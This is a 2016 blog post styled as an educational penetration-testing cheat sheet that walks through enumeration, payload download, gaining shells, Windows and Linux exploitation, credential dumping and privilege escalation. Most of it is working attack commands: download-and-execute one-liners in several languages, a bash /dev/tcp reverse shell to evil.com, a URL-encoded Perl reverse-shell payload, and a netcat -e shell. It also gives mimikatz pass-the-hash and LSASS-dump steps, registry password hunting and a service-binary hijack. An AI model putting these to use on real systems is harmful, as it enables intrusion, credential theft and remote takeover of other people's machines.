Pages

Thursday 3 November 2016

General Exploitation Scenario

This article is for educational purposes only, I am no responsible for any damage applied wrongly by using this knowledge - it is as it is, a security research. The article does not mean to be full, but to create a scenario for security researchers, I have taken information from various resources as you will see and I have mentioned them - if I have missed something please excuse me. 

0. Enumaration

netdiscover -r <network>/24

nmap -sV -T4 -O -F --version-light <ip>
nmap -sC -sS -T4 -A -v -v -Pn <ip>
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 <ip>
dirb http://<ip>
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://<ip>/FUZZ
smbclient -N -L <ip>
enum4linux -a <ip>
nikto -h <ip>

1. Download a file:


bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe

bitsadmin /transfer wcb /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://download.url c:\mess.exe&start mess.exe"

tftp -i host GET C:%homepath%file location_of_file_on_tftp_server


ftp 127.0.0.1 username password get file exit


cmd.exe /c "@echo open 192.168.1.3>script.txt&@echo binary>>script.txt&@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"


VB:
Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:%homepath%file", 2 ' end with

cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs &@echo objXMLHTTP.open "GET","download.url/messbo x.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB .Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream. Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc. vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi le "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb s&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"

PS:
$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:%homepath%file")
powershell set-executionpolicy unrestricted
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"
#!/usr/bin/php <?php         $data = @file("http://example.com/file");         $lf = "local_file";         $fh = fopen($lf, 'w');         fwrite($fh, $data[0]);         fclose($fh); ?>

echo "<?php file_put_contents('28718.c', fopen('http://download.url/28718.c', 'r')); ?>" > down2.php


#!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");

#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close()

#!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }
Bash:
exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done

References:

http://stackoverflow.com/questions/4619088/windows-batch-file-file-download-from-a-url
https://codingsec.net/2016/06/download-file-using-command-line/
https://blog.netspi.com/15-ways-to-download-a-file/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
https://www.greyhathacker.net/?p=500

2. Get a limited shell:




h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>'
shell> id 
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>

By default, it assumes a GET request and uses the inline shell mode.

To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.

For example:
h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>

Perl:

http://<ip>:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27

References:

https://n0where.net/common-reverse-shells/
https://github.com/infodox/web-exploitation-engine
http://insecurety.net/?tag=rce-py
https://web.archive.org/web/20160409012342/http://ptscripts.googlecode.com/svn/trunk/rce.py
https://www.exploit-db.com/papers/12871/
http://snipplr.com/view/72936/simple-php-backdoor-shell/
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html
http://www.c7ks.xyz/index.php/archives/18/
https://www.exploit-db.com/exploits/8921/
http://www.securityfocus.com/bid/55672/exploit
https://www.exploit-db.com/exploits/25136/

2.1 Direct Exploitation (Windows):

Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026):
https://www.exploit-db.com/exploits/100/

Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039):
https://www.exploit-db.com/exploits/103/

Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039):
https://www.exploit-db.com/exploits/109/

Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049):
https://www.exploit-db.com/exploits/119/

Microsoft Windows - ASN.1 Remote Exploit (MS04-007):
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz

Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011):
https://www.exploit-db.com/exploits/275/

Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011):
https://www.exploit-db.com/exploits/295/

Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031):
https://www.exploit-db.com/exploits/734/

Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
https://www.exploit-db.com/exploits/1075/

Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039):
https://www.exploit-db.com/exploits/1149/

Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040):
https://www.exploit-db.com/exploits/2223/

Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2):
https://www.exploit-db.com/exploits/2265/

Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070):
https://www.exploit-db.com/exploits/2789/


Microsoft Windows Server - Code Execution (MS08-067):
https://www.exploit-db.com/exploits/7104/

Microsoft Windows Server 2000/2003 - Code Execution (MS08-067):
https://www.exploit-db.com/exploits/7132/

Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050):
https://www.exploit-db.com/exploits/14674/

Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
https://www.exploit-db.com/exploits/14607/

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)
https://www.exploit-db.com/exploits/12273/

2.2. Direct Exploitation (Linux):

Read (carefully) the Kioptrix series, there are very nice examples.

2.3. Directory traversals:

https://pentestlab.wordpress.com/2012/06/29/directory-traversal-cheat-sheet/
https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/
https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
https://blog.techorganic.com/2012/06/21/lets-kick-shell-ish-part-1-directory-traversal-made-easy/

3.1 Attempt hashdump (Windows)

Mimikatz Commands:


logonpasswords: mimikatz # sekurlsa::logonpasswords)

Extracts passwords in memory

pth (pass the hash):

mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
A fake identity is created and the faske identitt’s NTLM hash is replaced with the real one.
“ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)”
“AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”

ptt (pass the ticket):

mimikatz # kerberos::ptt
Enables Kerberos ticket (TGT or TGS) injection into the current session.
tickets:  mimikatz # sekurlsa::tickets /export
Identifies all session Kerberos tickets and lists/exports them.
sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
ekeys:  mimikatz # sekurlsa::ekeys
Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user).
dpapi:  mimikatz # sekurlsa::dpapi

minidump:

mimikatz # sekurlsa::minidump lsass.dmp
Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system).

kerberos:

mimikatz # sekurlsa::kerberos
 Extracts the smartcad/PIV PIN from memory (cached in LSASS when using a smartcard).

debug:

mimikatz # privilege::debug
Sets debug mode for current mimikatz session enabling LSASS access.
lsadump cache: (requires token::elevate to be SYSTEM)
mimikatz # lsadump::cache
Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM).

Download procdump 

http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

Create lsass.exe from lsass.dump from step#2

procdump -accepteula -ma lsass.exe lsass.dmp

Download mimikatz from https://github.com/thomhastings/mimikatz-en


Run mimikatz


Use debug mode

privilege::debug 

Switch minidump

sekurlsa::minidump lsass.dmp

List all logon, now you will see the password

sekurlsa::logonPasswords

if you don't dump the memory, you must use this method

Run mimikatz
Inject sekurlsa.dll into lsass.exe:
inject::process lsass.exe sekurlsa.dll

List all password:

@getLogonPasswords
4.1 Escalate (Windows):

Try 1:

https://github.com/shjalayeri/sysret
Tasklist
sysret -pid <explorer pid>

Try 2:

Process Injector:
http://www.tarasco.org/security/Process_Injector/

Try 3:

KiTrap0D 
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip

Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ):
https://www.exploit-db.com/exploits/25912/

Try 4:

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx

Service Tracing Key (MS10-059)

http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554

Ryujin - ADF.sys priv esc - ms11-080

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/

UAC Bypass priv esc

http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info

Try 5: 

c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=

c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini


Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html


VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"


Windows Autologin: 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"


SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"


Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe)  to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]

reg query HKCU /f password /t REG_SZ /s [ |clip]

Change the upnp service binary
http://lanmaster53.com



sc qc upnphost
sc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost


------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027

Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?


sysinternals tools
accesschk.exe -uwcqv *

*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access

------------------------------------------------------------------------------------------------------

References:

http://it-ovid.blogspot.bg/2012/02/windows-privilege-escalation.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
https://www.nightlionsecurity.com/blog/guides/2012/11/windows-7-privilege-escelation-uac-bypass-guide-with-sysret-exploit/
https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
http://www.top-password.com/blog/reset-windows-10-password-with-sticky-keys/
http://toshellandback.com/2015/11/24/ms-priv-esc/





4.2 Escalate Linux:

find / -user root -perm -4000 -ls 2>/dev/null



Read this carefully:

http://www.doomedraven.com/2013/04/hacking-linux-part-i-privilege.html

Exploit for distcc to escalate the privilege from user daemon to root.
wget --no-check-certificate http://www.exploit-db.com/download/8572 -O exploit-8572.c
ls -l exploit-8572.c
gcc exploit-8572.c -o exploit-8572
ls -l exploit-8572*
echo '#!/bin/sh' > /tmp/run echo '/bin/netcat -e /bin/sh <our ip> 4444' >> /tmp/run ps -eaf | grep udev | grep -v grep [1] Record your PID (2709), [2] subtract 1 (2708), and [3] supply new PID to the next step. Subtract 1 from the process ID (PID) number

./exploit-8572 2708

Other exploits:
http://clshack.com/index.html%3Fp=3442.html
https://git.zx2c4.com/CVE-2012-0056/about/
https://git.zx2c4.com/CVE-2012-0056/tree/


References:
https://www.pentestpartners.com/blog/exploiting-suid-executables/
https://blog.sucuri.net/2013/05/from-a-site-compromise-to-full-root-access-symlinks-to-root-part-i.html